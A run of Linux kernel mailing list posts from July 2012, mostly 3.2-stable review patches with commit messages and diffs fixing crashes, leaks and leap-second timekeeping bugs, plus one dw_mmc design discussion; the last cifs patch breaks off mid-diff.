[ 072/108] dm raid1: fix crash with mirror recovery and discard

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mikulas Patocka 

commit 751f188dd5ab95b3f2b5f2f467c38aae5a2877eb upstream.

This patch fixes a crash when a discard request is sent during mirror
recovery.

Firstly, some background.  Generally, the following sequence happens during
mirror synchronization:
- function do_recovery is called
- do_recovery calls dm_rh_recovery_prepare
- dm_rh_recovery_prepare uses a semaphore to limit the number
  simultaneously recovered regions (by default the semaphore value is 1,
  so only one region at a time is recovered)
- dm_rh_recovery_prepare calls __rh_recovery_prepare,
  __rh_recovery_prepare asks the log driver for the next region to
  recover. Then, it sets the region state to DM_RH_RECOVERING. If there
  are no pending I/Os on this region, the region is added to
  quiesced_regions list. If there are pending I/Os, the region is not
  added to any list. It is added to the quiesced_regions list later (by
  dm_rh_dec function) when all I/Os finish.
- when the region is on quiesced_regions list, there are no I/Os in
  flight on this region. The region is popped from the list in
  dm_rh_recovery_start function. Then, a kcopyd job is started in the
  recover function.
- when the kcopyd job finishes, recovery_complete is called. It calls
  dm_rh_recovery_end. dm_rh_recovery_end adds the region to
  recovered_regions or failed_recovered_regions list (depending on
  whether the copy operation was successful or not).

The above mechanism assumes that if the region is in DM_RH_RECOVERING
state, no new I/Os are started on this region. When I/O is started,
dm_rh_inc_pending is called, which increases reg->pending count. When
I/O is finished, dm_rh_dec is called. It decreases reg->pending count.
If the count is zero and the region was in DM_RH_RECOVERING state,
dm_rh_dec adds it to the quiesced_regions list.

Consequently, if we call dm_rh_inc_pending/dm_rh_dec while the region is
in DM_RH_RECOVERING state, it could be added to quiesced_regions list
multiple times or it could be added to this list when kcopyd is copying
data (it is assumed that the region is not on any list while kcopyd does
its jobs). This results in memory corruption and crash.

There already exist bypasses for REQ_FLUSH requests: REQ_FLUSH requests
do not belong to any region, so they are always added to the sync list
in do_writes. dm_rh_inc_pending does not increase count for REQ_FLUSH
requests. In mirror_end_io, dm_rh_dec is never called for REQ_FLUSH
requests. These bypasses avoid the crash possibility described above.

These bypasses were improperly implemented for REQ_DISCARD when
the mirror target gained discard support in commit
5fc2ffeabb9ee0fc0e71ff16b49f34f0ed3d05b4 (dm raid1: support discard).

In do_writes, REQ_DISCARD requests is always added to the sync queue and
immediately dispatched (even if the region is in DM_RH_RECOVERING).  However,
dm_rh_inc and dm_rh_dec is called for REQ_DISCARD resusts.  So it violates the
rule that no I/Os are started on DM_RH_RECOVERING regions, and causes the list
corruption described above.

This patch changes it so that REQ_DISCARD requests follow the same path
as REQ_FLUSH. This avoids the crash.

Reference: https://bugzilla.redhat.com/837607

Signed-off-by: Mikulas Patocka 
Signed-off-by: Alasdair G Kergon 
Signed-off-by: Ben Hutchings 
---
 drivers/md/dm-raid1.c   |2 +-
 drivers/md/dm-region-hash.c |5 -
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
index d039de8..ea16984 100644
--- a/drivers/md/dm-raid1.c
+++ b/drivers/md/dm-raid1.c
@@ -1214,7 +1214,7 @@ static int mirror_end_io(struct dm_target *ti, struct bio 
*bio,
 * We need to dec pending if this was a write.
 */
if (rw == WRITE) {
-   if (!(bio->bi_rw & REQ_FLUSH))
+   if (!(bio->bi_rw & (REQ_FLUSH | REQ_DISCARD)))
dm_rh_dec(ms->rh, map_context->ll);
return error;
}
diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
index 7771ed2..69732e0 100644
--- a/drivers/md/dm-region-hash.c
+++ b/drivers/md/dm-region-hash.c
@@ -404,6 +404,9 @@ void dm_rh_mark_nosync(struct dm_region_hash *rh, struct 
bio *bio)
return;
}
 
+   if (bio->bi_rw & REQ_DISCARD)
+   return;
+
/* We must inform the log that the sync count has changed. */
log->type->set_region_sync(log, region, 0);
 
@@ -524,7 +527,7 @@ void dm_rh_inc_pending(struct dm_region_hash *rh, struct 
bio_list *bios)
struct bio *bio;
 
for (bio = bios->head; bio; bio = bio->bi_next) {
-   if (bio->bi_rw & REQ_FLUSH)
+   if (bio->bi_rw & (REQ_FLUSH | REQ_DISCARD))
continue;
rh_inc(rh, dm_rh_bio_to_region(rh, bio));
}


--
To unsubscribe from this list: send the line "unsubscribe 

Re: [PATCH v3 0/6] mmc: dw_mmc: add support for device tree based instantiation

2012-07-22 Thread Jaehoon Chung
On 07/20/2012 07:47 AM, Kukjin Kim wrote:
> Thomas Abraham wrote:
>>
>> On 19 July 2012 20:58, Jaehoon Chung  wrote:
>>> Hi Thomas,
>>>
>>> I think not good that added the samsung specific code into dw_mmc-
>> pltfm.c
>>> How about separating to dw-mmc-exynos.c?
>>
>> I am not sure of this. The only samsung specific code in
>> dw_mmc-pltfm.c file is the data for of_device_id instances. The clock
>> lookup added into this file in the 3rd patch does not cause any harm
>> on non-samsung SoC's which might not define those clocks (on clock
>> lookup failure, there are only warning printed, the driver's probe
>> does not fail.
>>
> I agree with Thomas' opinion, in addition, the dw_mmc-pltfm.c file can
> support that, so adding dw-mmc-exynos.c is not needed now.
> 
>> I would prefer not to add separate file for Exynos SoC's for now.
>> Splitting into different files will need to defined new callbacks
>> which I fell is not really required.
Then where is the callback function located?

Best Regards,
Jaehoon Chung
>>
> Yes.
> 
> Thanks.
> 
> Best regards,
> Kgene.
> --
> Kukjin Kim , Senior Engineer,
> SW Solution Development Team, Samsung Electronics Co., Ltd.
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-mmc" in
> the body of a message to majord...@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 070/108] pnfs-obj: dont leak objio_state if ore_write/read fails

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit 9909d45a8557455ca5f8ee7af0f253debc851f1a upstream.

[Bug since 3.2 Kernel]
Signed-off-by: Boaz Harrosh 
Signed-off-by: Ben Hutchings 
---
 fs/nfs/objlayout/objio_osd.c |9 +++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/fs/nfs/objlayout/objio_osd.c b/fs/nfs/objlayout/objio_osd.c
index b47277b..86d7595 100644
--- a/fs/nfs/objlayout/objio_osd.c
+++ b/fs/nfs/objlayout/objio_osd.c
@@ -454,7 +454,10 @@ int objio_read_pagelist(struct nfs_read_data *rdata)
objios->ios->done = _read_done;
dprintk("%s: offset=0x%llx length=0x%x\n", __func__,
rdata->args.offset, rdata->args.count);
-   return ore_read(objios->ios);
+   ret = ore_read(objios->ios);
+   if (unlikely(ret))
+   objio_free_result(&objios->oir);
+   return ret;
 }
 
 /*
@@ -539,8 +542,10 @@ int objio_write_pagelist(struct nfs_write_data *wdata, int 
how)
dprintk("%s: offset=0x%llx length=0x%x\n", __func__,
wdata->args.offset, wdata->args.count);
ret = ore_write(objios->ios);
-   if (unlikely(ret))
+   if (unlikely(ret)) {
+   objio_free_result(&objios->oir);
return ret;
+   }
 
if (objios->sync)
_write_done(objios->ios, objios);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 078/108] hrtimer: Provide clock_was_set_delayed()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

commit f55a6faa384304c89cfef162768e88374d3312cb upstream.

clock_was_set() cannot be called from hard interrupt context because
it calls on_each_cpu().

For fixing the widely reported leap seconds issue it is necessary to
call it from hard interrupt context, i.e. the timer tick code, which
does the timekeeping updates.

Provide a new function which denotes it in the hrtimer cpu base
structure of the cpu on which it is called and raise the hrtimer
softirq. We then execute the clock_was_set() notificiation from
softirq context in run_hrtimer_softirq(). The hrtimer softirq is
rarely used, so polling the flag there is not a performance issue.

[ tglx: Made it depend on CONFIG_HIGH_RES_TIMERS. We really should get
  rid of all this ifdeffery ASAP ]

Signed-off-by: John Stultz 
Reported-by: Jan Engelhardt 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: 
http://lkml.kernel.org/r/1341960205-56738-2-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Signed-off-by: Ben Hutchings 
---
 include/linux/hrtimer.h |9 -
 kernel/hrtimer.c|   20 
 2 files changed, 28 insertions(+), 1 deletion(-)

diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
index fd0dc30..c9ec940 100644
--- a/include/linux/hrtimer.h
+++ b/include/linux/hrtimer.h
@@ -165,6 +165,7 @@ enum  hrtimer_base_type {
  * @lock:  lock protecting the base and associated clock bases
  * and timers
  * @active_bases:  Bitfield to mark bases with active timers
+ * @clock_was_set: Indicates that clock was set from irq context.
  * @expires_next:  absolute time of the next event which was scheduled
  * via clock_set_next_event()
  * @hres_active:   State of high resolution mode
@@ -177,7 +178,8 @@ enum  hrtimer_base_type {
  */
 struct hrtimer_cpu_base {
raw_spinlock_t  lock;
-   unsigned long   active_bases;
+   unsigned intactive_bases;
+   unsigned intclock_was_set;
 #ifdef CONFIG_HIGH_RES_TIMERS
ktime_t expires_next;
int hres_active;
@@ -286,6 +288,8 @@ extern void hrtimer_peek_ahead_timers(void);
 # define MONOTONIC_RES_NSECHIGH_RES_NSEC
 # define KTIME_MONOTONIC_RES   KTIME_HIGH_RES
 
+extern void clock_was_set_delayed(void);
+
 #else
 
 # define MONOTONIC_RES_NSECLOW_RES_NSEC
@@ -306,6 +310,9 @@ static inline int hrtimer_is_hres_active(struct hrtimer 
*timer)
 {
return 0;
 }
+
+static inline void clock_was_set_delayed(void) { }
+
 #endif
 
 extern void clock_was_set(void);
diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
index ae34bf5..3c24fb2 100644
--- a/kernel/hrtimer.c
+++ b/kernel/hrtimer.c
@@ -717,6 +717,19 @@ static int hrtimer_switch_to_hres(void)
return 1;
 }
 
+/*
+ * Called from timekeeping code to reprogramm the hrtimer interrupt
+ * device. If called from the timer interrupt context we defer it to
+ * softirq context.
+ */
+void clock_was_set_delayed(void)
+{
+   struct hrtimer_cpu_base *cpu_base = &__get_cpu_var(hrtimer_bases);
+
+   cpu_base->clock_was_set = 1;
+   __raise_softirq_irqoff(HRTIMER_SOFTIRQ);
+}
+
 #else
 
 static inline int hrtimer_hres_active(void) { return 0; }
@@ -1395,6 +1408,13 @@ void hrtimer_peek_ahead_timers(void)
 
 static void run_hrtimer_softirq(struct softirq_action *h)
 {
+   struct hrtimer_cpu_base *cpu_base = &__get_cpu_var(hrtimer_bases);
+
+   if (cpu_base->clock_was_set) {
+   cpu_base->clock_was_set = 0;
+   clock_was_set();
+   }
+
hrtimer_peek_ahead_timers();
 }
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 079/108] timekeeping: Fix leapsecond triggered load spike issue

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of 4873fa070ae84a4115f0b3c9dfabc224f1bc7c51

The timekeeping code misses an update of the hrtimer subsystem after a
leap second happened. Due to that timers based on CLOCK_REALTIME are
either expiring a second early or late depending on whether a leap
second has been inserted or deleted until an operation is initiated
which causes that update. Unless the update happens by some other
means this discrepancy between the timekeeping and the hrtimer data
stays forever and timers are expired either early or late.

The reported immediate workaround - $ data -s "`date`" - is causing a
call to clock_was_set() which updates the hrtimer data structures.
See: http://www.sheeri.com/content/mysql-and-leap-second-high-cpu-and-fix

Add the missing clock_was_set() call to update_wall_time() in case of
a leap second event. The actual update is deferred to softirq context
as the necessary smp function call cannot be invoked from hard
interrupt context.

Signed-off-by: John Stultz 
Reported-by: Jan Engelhardt 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: 
http://lkml.kernel.org/r/1341960205-56738-3-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |4 
 1 file changed, 4 insertions(+)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 5d55185..8958ad7 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -941,6 +941,8 @@ static cycle_t logarithmic_accumulation(cycle_t offset, int 
shift)
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
wall_to_monotonic.tv_sec -= leap;
+   if (leap)
+   clock_was_set_delayed();
}
 
/* Accumulate raw time */
@@ -1052,6 +1054,8 @@ static void update_wall_time(void)
leap = second_overflow(xtime.tv_sec);
xtime.tv_sec += leap;
wall_to_monotonic.tv_sec -= leap;
+   if (leap)
+   clock_was_set_delayed();
}
 
timekeeping_update(false);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 084/108] timekeeping: Add missing update call in timekeeping_resume()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Gleixner 

This is a backport of 3e997130bd2e8c6f5aaa49d6e3161d4d29b43ab0

The leap second rework unearthed another issue of inconsistent data.

On timekeeping_resume() the timekeeper data is updated, but nothing
calls timekeeping_update(), so now the update code in the timer
interrupt sees stale values.

This has been the case before those changes, but then the timer
interrupt was using stale data as well so this went unnoticed for quite
some time.

Add the missing update call, so all the data is consistent everywhere.

Reported-by: Andreas Schwab 
Reported-and-tested-by: "Rafael J. Wysocki" 
Reported-and-tested-by: Martin Steigerwald 
Cc: LKML 
Cc: Linux PM list 
Cc: John Stultz 
Cc: Ingo Molnar 
Cc: Peter Zijlstra ,
Cc: Prarit Bhargava 
Signed-off-by: Thomas Gleixner 
Signed-off-by: John Stultz 
Signed-off-by: Linus Torvalds 
[John Stultz: Backported to 3.2]
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 4938c5e..03e67d4 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -699,6 +699,7 @@ static void timekeeping_resume(void)
timekeeper.clock->cycle_last = timekeeper.clock->read(timekeeper.clock);
timekeeper.ntp_error = 0;
timekeeping_suspended = 0;
+   timekeeping_update(false);
write_sequnlock_irqrestore(&xtime_lock, flags);
 
touch_softlockup_watchdog();


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 069/108] ore: Remove support of partial IO request (NFS crash)

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit 62b62ad873f2accad9222a4d7ffbe1e93f6714c1 upstream.

Do to OOM situations the ore might fail to allocate all resources
needed for IO of the full request. If some progress was possible
it would proceed with a partial/short request, for the sake of
forward progress.

Since this crashes NFS-core and exofs is just fine without it just
remove this contraption, and fail.

TODO:
Support real forward progress with some reserved allocations
of resources, such as mem pools and/or bio_sets

[Bug since 3.2 Kernel]
CC: Benny Halevy 
Signed-off-by: Boaz Harrosh 
Signed-off-by: Ben Hutchings 
---
 fs/exofs/ore.c |8 +---
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/fs/exofs/ore.c b/fs/exofs/ore.c
index 49cf230..24a49d4 100644
--- a/fs/exofs/ore.c
+++ b/fs/exofs/ore.c
@@ -735,13 +735,7 @@ static int _prepare_for_striping(struct ore_io_state *ios)
 out:
ios->numdevs = devs_in_group;
ios->pages_consumed = cur_pg;
-   if (unlikely(ret)) {
-   if (length == ios->length)
-   return ret;
-   else
-   ios->length -= length;
-   }
-   return 0;
+   return ret;
 }
 
 int ore_create(struct ore_io_state *ios)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 071/108] pnfs-obj: Fix __r4w_get_page when offset is beyond i_size

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit c999ff68029ebd0f56ccae75444f640f6d5a27d2 upstream.

It is very common for the end of the file to be unaligned on
stripe size. But since we know it's beyond file's end then
the XOR should be preformed with all zeros.

Old code used to just read zeros out of the OSD devices, which is a great
waist. But what scares me more about this situation is that, we now have
pages attached to the file's mapping that are beyond i_size. I don't
like the kind of bugs this calls for.

Fix both birds, by returning a global zero_page, if offset is beyond
i_size.

TODO:
Change the API to ->__r4w_get_page() so a NULL can be
returned without being considered as error, since XOR API
treats NULL entries as zero_pages.

[Bug since 3.2. Should apply the same way to all Kernels since]
Signed-off-by: Boaz Harrosh 
[bwh: Backported to 3.2: adjust for lack of wdata->header]
Signed-off-by: Ben Hutchings 
---
--- a/fs/nfs/objlayout/objio_osd.c
+++ b/fs/nfs/objlayout/objio_osd.c
@@ -467,8 +467,16 @@ static struct page *__r4w_get_page(void
struct objio_state *objios = priv;
struct nfs_write_data *wdata = objios->oir.rpcdata;
pgoff_t index = offset / PAGE_SIZE;
-   struct page *page = find_get_page(wdata->inode->i_mapping, index);
+   struct page *page;
+   loff_t i_size = i_size_read(wdata->inode);
 
+   if (offset >= i_size) {
+   *uptodate = true;
+   dprintk("%s: g_zero_page index=0x%lx\n", __func__, index);
+   return ZERO_PAGE(0);
+   }
+
+   page = find_get_page(wdata->inode->i_mapping, index);
if (!page) {
page = find_or_create_page(wdata->inode->i_mapping,
index, GFP_NOFS);
@@ -489,8 +497,10 @@ static struct page *__r4w_get_page(void
 
 static void __r4w_put_page(void *priv, struct page *page)
 {
-   dprintk("%s: index=0x%lx\n", __func__, page->index);
-   page_cache_release(page);
+   dprintk("%s: index=0x%lx\n", __func__,
+   (page == ZERO_PAGE(0)) ? -1UL : page->index);
+   if (ZERO_PAGE(0) != page)
+   page_cache_release(page);
return;
 }
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 074/108] ntp: Fix leap-second hrtimer livelock

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of 6b43ae8a619d17c4935c3320d2ef9e92bdeed05d

This should have been backported when it was commited, but I
mistook the problem as requiring the ntp_lock changes
that landed in 3.4 in order for it to occur.

Unfortunately the same issue can happen (with only one cpu)
as follows:
do_adjtimex()
 write_seqlock_irq(&xtime_lock);
  process_adjtimex_modes()
   process_adj_status()
ntp_start_leap_timer()
 hrtimer_start()
  hrtimer_reprogram()
   tick_program_event()
clockevents_program_event()
 ktime_get()
  seq = req_seqbegin(xtime_lock); [DEADLOCK]

This deadlock will no always occur, as it requires the
leap_timer to force a hrtimer_reprogram which only happens
if its set and there's no sooner timer to expire.

NOTE: This patch, being faithful to the original commit,
introduces a bug (we don't update wall_to_monotonic),
which will be resovled by backporting a following fix.

Original commit message below:

Since commit 7dffa3c673fbcf835cd7be80bb4aec8ad3f51168 the ntp
subsystem has used an hrtimer for triggering the leapsecond
adjustment. However, this can cause a potential livelock.

Thomas diagnosed this as the following pattern:
CPU 0CPU 1
do_adjtimex()
  spin_lock_irq(&ntp_lock);
process_adjtimex_modes();timer_interrupt()
  process_adj_status();do_timer()
ntp_start_leap_timer(); 
write_lock(&xtime_lock);
  hrtimer_start();  update_wall_time();
 hrtimer_reprogram();ntp_tick_length()
   tick_program_event()
spin_lock(&ntp_lock);
 clockevents_program_event()
   ktime_get()
 seq = req_seqbegin(xtime_lock);

This patch tries to avoid the problem by reverting back to not using
an hrtimer to inject leapseconds, and instead we handle the leapsecond
processing in the second_overflow() function.

The downside to this change is that on systems that support highres
timers, the leap second processing will occur on a HZ tick boundary,
(ie: ~1-10ms, depending on HZ)  after the leap second instead of
possibly sooner (~34us in my tests w/ x86_64 lapic).

This patch applies on top of tip/timers/core.

CC: Sasha Levin 
CC: Thomas Gleixner 
Reported-by: Sasha Levin 
Diagnoised-by: Thomas Gleixner 
Tested-by: Sasha Levin 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 include/linux/timex.h |2 +-
 kernel/time/ntp.c |  122 +++--
 kernel/time/timekeeping.c |   18 +++
 3 files changed, 48 insertions(+), 94 deletions(-)

diff --git a/include/linux/timex.h b/include/linux/timex.h
index aa60fe7..08e90fb 100644
--- a/include/linux/timex.h
+++ b/include/linux/timex.h
@@ -266,7 +266,7 @@ static inline int ntp_synced(void)
 /* Returns how long ticks are at present, in ns / 2^NTP_SCALE_SHIFT. */
 extern u64 tick_length;
 
-extern void second_overflow(void);
+extern int second_overflow(unsigned long secs);
 extern void update_ntp_one_tick(void);
 extern int do_adjtimex(struct timex *);
 extern void hardpps(const struct timespec *, const struct timespec *);
diff --git a/kernel/time/ntp.c b/kernel/time/ntp.c
index 4b85a7a..4508f7f 100644
--- a/kernel/time/ntp.c
+++ b/kernel/time/ntp.c
@@ -31,8 +31,6 @@ unsigned long tick_nsec;
 u64tick_length;
 static u64 tick_length_base;
 
-static struct hrtimer  leap_timer;
-
 #define MAX_TICKADJ500LL   /* usecs */
 #define MAX_TICKADJ_SCALED \
(((MAX_TICKADJ * NSEC_PER_USEC) << NTP_SCALE_SHIFT) / NTP_INTERVAL_FREQ)
@@ -350,60 +348,60 @@ void ntp_clear(void)
 }
 
 /*
- * Leap second processing. If in leap-insert state at the end of the
- * day, the system clock is set back one second; if in leap-delete
- * state, the system clock is set ahead one second.
+ * this routine handles the overflow of the microsecond field
+ *
+ * The tricky bits of code to handle the accurate clock support
+ * were provided by Dave Mills (mi...@udel.edu) of NTP fame.
+ * They were originally developed for SUN and DEC kernels.
+ * All the kudos should go to Dave for this stuff.
+ *
+ * Also handles leap second processing, and returns leap offset
  */
-static enum hrtimer_restart ntp_leap_second(struct hrtimer *timer)
+int second_overflow(unsigned long secs)
 {
-   enum hrtimer_restart res = HRTIMER_NORESTART;
-
-   write_seqlock(&xtime_lock);
+   int leap = 0;
+   s64 delta;
 
+   /*
+* Leap second processing. If in leap-insert state at the end of the
+* day, the system c

[ 064/108] md: avoid crash when stopping md array races with closing other open fds.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit a05b7ea03d72f36edb0cec05e8893803335c61a0 upstream.

md will refuse to stop an array if any other fd (or mounted fs) is
using it.
When any fs is unmounted of when the last open fd is closed all
pending IO will be flushed (e.g. sync_blockdev call in __blkdev_put)
so there will be no pending IO to worry about when the array is
stopped.

However in order to send the STOP_ARRAY ioctl to stop the array one
must first get and open fd on the block device.
If some fd is being used to write to the block device and it is closed
after mdadm open the block device, but before mdadm issues the
STOP_ARRAY ioctl, then there will be no last-close on the md device so
__blkdev_put will not call sync_blockdev.

If this happens, then IO can still be in-flight while md tears down
the array and bad things can happen (use-after-free and subsequent
havoc).

So in the case where do_md_stop is being called from an open file
descriptor, call sync_block after taking the mutex to ensure there
will be no new openers.

This is needed when setting a read-write device to read-only too.

Reported-by: majianpeng 
Signed-off-by: NeilBrown 
Signed-off-by: Ben Hutchings 
---
 drivers/md/md.c |   36 +++-
 1 file changed, 23 insertions(+), 13 deletions(-)

diff --git a/drivers/md/md.c b/drivers/md/md.c
index 0c1fe4cb..d5ab449 100644
--- a/drivers/md/md.c
+++ b/drivers/md/md.c
@@ -3927,8 +3927,8 @@ array_state_show(struct mddev *mddev, char *page)
return sprintf(page, "%s\n", array_states[st]);
 }
 
-static int do_md_stop(struct mddev * mddev, int ro, int is_open);
-static int md_set_readonly(struct mddev * mddev, int is_open);
+static int do_md_stop(struct mddev * mddev, int ro, struct block_device *bdev);
+static int md_set_readonly(struct mddev * mddev, struct block_device *bdev);
 static int do_md_run(struct mddev * mddev);
 static int restart_array(struct mddev *mddev);
 
@@ -3944,14 +3944,14 @@ array_state_store(struct mddev *mddev, const char *buf, 
size_t len)
/* stopping an active array */
if (atomic_read(&mddev->openers) > 0)
return -EBUSY;
-   err = do_md_stop(mddev, 0, 0);
+   err = do_md_stop(mddev, 0, NULL);
break;
case inactive:
/* stopping an active array */
if (mddev->pers) {
if (atomic_read(&mddev->openers) > 0)
return -EBUSY;
-   err = do_md_stop(mddev, 2, 0);
+   err = do_md_stop(mddev, 2, NULL);
} else
err = 0; /* already inactive */
break;
@@ -3959,7 +3959,7 @@ array_state_store(struct mddev *mddev, const char *buf, 
size_t len)
break; /* not supported yet */
case readonly:
if (mddev->pers)
-   err = md_set_readonly(mddev, 0);
+   err = md_set_readonly(mddev, NULL);
else {
mddev->ro = 1;
set_disk_ro(mddev->gendisk, 1);
@@ -3969,7 +3969,7 @@ array_state_store(struct mddev *mddev, const char *buf, 
size_t len)
case read_auto:
if (mddev->pers) {
if (mddev->ro == 0)
-   err = md_set_readonly(mddev, 0);
+   err = md_set_readonly(mddev, NULL);
else if (mddev->ro == 1)
err = restart_array(mddev);
if (err == 0) {
@@ -5352,15 +5352,17 @@ void md_stop(struct mddev *mddev)
 }
 EXPORT_SYMBOL_GPL(md_stop);
 
-static int md_set_readonly(struct mddev *mddev, int is_open)
+static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
 {
int err = 0;
mutex_lock(&mddev->open_mutex);
-   if (atomic_read(&mddev->openers) > is_open) {
+   if (atomic_read(&mddev->openers) > !!bdev) {
printk("md: %s still in use.\n",mdname(mddev));
err = -EBUSY;
goto out;
}
+   if (bdev)
+   sync_blockdev(bdev);
if (mddev->pers) {
__md_stop_writes(mddev);
 
@@ -5382,18 +5384,26 @@ out:
  *   0 - completely stop and dis-assemble array
  *   2 - stop but do not disassemble array
  */
-static int do_md_stop(struct mddev * mddev, int mode, int is_open)
+static int do_md_stop(struct mddev * mddev, int mode,
+ struct block_device *bdev)
 {
struct gendisk *disk = mddev->gendisk;
struct md_rdev *rdev;
 
mutex_lock(&mddev->open_mutex);
-   if (atomic_read(&mddev->openers) > is_open ||
+   if (atomic_read(&mddev->openers) > !!bdev ||
mddev->sysfs_active) {
printk("md: %s still in use.\n",mdname(mddev));

[ 061/108] cifs: on CONFIG_HIGHMEM machines, limit the rsize/wsize to the kmap space

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Layton 

commit 3ae629d98bd5ed77585a878566f04f310adbc591 upstream.

We currently rely on being able to kmap all of the pages in an async
read or write request. If you're on a machine that has CONFIG_HIGHMEM
set then that kmap space is limited, sometimes to as low as 512 slots.

With 512 slots, we can only support up to a 2M r/wsize, and that's
assuming that we can get our greedy little hands on all of them. There
are other users however, so it's possible we'll end up stuck with a
size that large.

Since we can't handle a rsize or wsize larger than that currently, cap
those options at the number of kmap slots we have. We could consider
capping it even lower, but we currently default to a max of 1M. Might as
well allow those luddites on 32 bit arches enough rope to hang
themselves.

A more robust fix would be to teach the send and receive routines how
to contend with an array of pages so we don't need to marshal up a kvec
array at all. That's a fairly significant overhaul though, so we'll need
this limit in place until that's ready.

Reported-by: Jian Li 
Signed-off-by: Jeff Layton 
Signed-off-by: Steve French 
Signed-off-by: Ben Hutchings 
---
 fs/cifs/connect.c |   18 ++
 1 file changed, 18 insertions(+)

diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
index 0ae86dd..94b7788 100644
--- a/fs/cifs/connect.c
+++ b/fs/cifs/connect.c
@@ -3445,6 +3445,18 @@ void cifs_setup_cifs_sb(struct smb_vol *pvolume_info,
 #define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
 #define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
 
+/*
+ * On hosts with high memory, we can't currently support wsize/rsize that are
+ * larger than we can kmap at once. Cap the rsize/wsize at
+ * LAST_PKMAP * PAGE_SIZE. We'll never be able to fill a read or write request
+ * larger than that anyway.
+ */
+#ifdef CONFIG_HIGHMEM
+#define CIFS_KMAP_SIZE_LIMIT   (LAST_PKMAP * PAGE_CACHE_SIZE)
+#else /* CONFIG_HIGHMEM */
+#define CIFS_KMAP_SIZE_LIMIT   (1<<24)
+#endif /* CONFIG_HIGHMEM */
+
 static unsigned int
 cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb_vol *pvolume_info)
 {
@@ -3475,6 +3487,9 @@ cifs_negotiate_wsize(struct cifs_tcon *tcon, struct 
smb_vol *pvolume_info)
wsize = min_t(unsigned int, wsize,
server->maxBuf - sizeof(WRITE_REQ) + 4);
 
+   /* limit to the amount that we can kmap at once */
+   wsize = min_t(unsigned int, wsize, CIFS_KMAP_SIZE_LIMIT);
+
/* hard limit of CIFS_MAX_WSIZE */
wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
 
